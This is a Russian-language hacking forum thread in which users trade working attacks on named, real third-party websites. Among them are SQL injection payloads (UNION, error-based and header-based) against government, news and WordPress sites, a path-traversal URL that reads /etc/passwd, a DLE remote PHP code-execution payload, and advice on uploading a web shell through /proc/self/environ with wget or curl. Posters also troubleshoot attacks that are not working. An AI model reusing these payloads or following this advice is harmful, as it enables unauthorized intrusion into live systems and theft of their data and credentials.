Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Да, кстати, а кто подскажет что это такое...?)
    Вроде как не слепая... С такой ещё не стыкался...
    http://www.rada-poltava.gov.ua/news/1'00000000'/
     
  2. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /
     
  3. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
     
  4. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Del msg
     
    #21804 Zed0x, 1 Feb 2013
    Last edited: 13 Jan 2014
  5. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
     
    1 person likes this.
  6. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    А что делать, если /proc/self/environ выглядит так:
    NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL
    Т.е., прочитать я его могу, но, кажется, что-то с ним не так
     
  7. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    там пхп не установлен походу
     
  8. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php

    http://www.exploit-db.com/exploits/24444/

    Смысл в том, что он под метасплоит.
    Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
    PHP:
    catlist[0]=brainyfuck123')||eval("echo 123;");//
    Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
    Подскажите, что делаю не так

    UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть :)
     
    #21808 Zed0x, 2 Feb 2013
    Last edited: 2 Feb 2013
  9. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.golowar.ru/news.php?id=67&page='
    пишет:
    Проверил сайт, можно ли считать это уязвимостью?
    Как дальше её раскрутить чтоб исправить!
     
    #21809 panfilov1991, 2 Feb 2013
    Last edited: 3 Feb 2013
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.
     
  11. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    del msg
     
    #21811 Zed0x, 3 Feb 2013
    Last edited: 13 Jan 2014
  12. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    не подскажите как раскрутить?
    Code:
    http://www.golowar.ru/news.php?id=67&page=' 
    перепробовал всё, результат одна и та же таблица
     
  13. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Никак, intval().
     
  14. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    то есть в базу не как не пробиться?
     
  15. BlackIce

    BlackIce Elder - Старейшина

    Joined:
    10 Jan 2013
    Messages:
    108
    Likes Received:
    31
    Reputations:
    27
    Not Acceptable :confused:
     
  16. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/
     
    2 people like this.
  17. BlackIce

    BlackIce Elder - Старейшина

    Joined:
    10 Jan 2013
    Messages:
    108
    Likes Received:
    31
    Reputations:
    27
    only error based ?
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Религия не позволяет использовать Error-Based ? Тот же вывод, в чём проблемы то ? Какая то особая ситуация ?
     
    _________________________
    1 person likes this.
  19. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    GET /news.php HTTP/1.1
    Host: www.golowar.ru
    X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

    Стоит WP на сервере там, вывести пароль не могу, в чем проблема?

    GET /news.php HTTP/1.1
    Host: www.golowar.ru
    X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((select(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

    Table 'wp.wp_users' doesn't exist
     
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Table 'wp.wp_users' doesn't exist
     
Loading...
Thread Status:
Not open for further replies.